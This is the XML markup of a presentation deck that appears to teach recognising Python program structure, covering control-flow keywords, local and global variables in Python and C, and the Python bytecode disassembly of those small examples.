                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>if</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Loop </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>while</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Function calls</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Other: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>switch</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>structs</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pP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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="1124280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fbd4b4"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Recognizing Python structure</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Local &amp; global variables</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251640" y="1845000"/>
            <a:ext cx="2592000" cy="255996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x = 1</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y = 2</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def main():</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global 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x = x + y</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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>print ("Total = ", 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main()</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251640" y="4151520"/>
            <a:ext cx="2592000" cy="228636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0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>def main():</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a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>int x = 1;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>int y = 2;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>x = x+y;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>printf("Total = %d\n", x);</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Calibri"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="570" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3017880" y="1159560"/>
            <a:ext cx="3024000" cy="885204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1           0 LOAD_CONST               0 (1)</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2 STORE_GLOBAL             0 (x)</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2           4 LOAD_CONST               1 (2)</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6 STORE_NAME               1 (y)</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4           8 LOAD_CONST               2</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10 LOAD_CONST               3 ('main')</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12 MAKE_FUNCTION            0</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14 STORE_NAME               2 (main)</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8          16 LOAD_NAME                2 (main)</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18 CALL_FUNCTION            0</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20 POP_TOP</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22 LOAD_CONST               4 (None)</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24 RETURN_VALUE</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6           0 LOAD_GLOBAL              0 (x)</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2 LOAD_GLOBAL              1 (y)</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4 BINARY_ADD</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6 STORE_GLOBAL             0 (x)</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7           8 LOAD_GLOBAL              2 (print)</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10 LOAD_CONST               1 ('Total = ')</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12 LOAD_GLOBAL              0 (x)</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14 CALL_FUNCTION            2</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16 POP_TOP</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18 LOAD_CONST               0 (None)</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20 RETURN_VALUE</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6047640" y="1200600"/>
            <a:ext cx="3096000" cy="8852040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>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1           0 LOAD_CONST               0 </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2 LOAD_CONST               1 ('main')</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4 MAKE_FUNCTION            0</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6 STORE_NAME               0 (main)</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6           8 LOAD_NAME                0 (main)</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10 CALL_FUNCTION            0</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12 POP_TOP</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14 LOAD_CONST               2 (None)</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16 RETURN_VALUE</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2           0 LOAD_CONST               1 (1)</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2 STORE_FAST               0 (x)</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3           4 LOAD_CONST               1 (1)</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6 STORE_FAST               1 (y)</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4           8 LOAD_FAST                0 (x)</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10 LOAD_FAST                1 (y)</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12 BINARY_ADD</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14 STORE_FAST               0 (x)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pP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5          16 LOAD_GLOBAL              0 (print)</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18 LOAD_CONST               2 ('Total = ')</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20 LOAD_FAST                0 (x)</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22 CALL_FUNCTION            2</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24 POP_TOP</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26 LOAD_CONST               0 (None)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>28 RETURN_VALUE</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25</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2017-06-08T06:53:33Z</dcterms:created>
  <dc:creator>TTS</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-04T17:17:58Z</dcterms:modified>
  <cp:revision>4</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>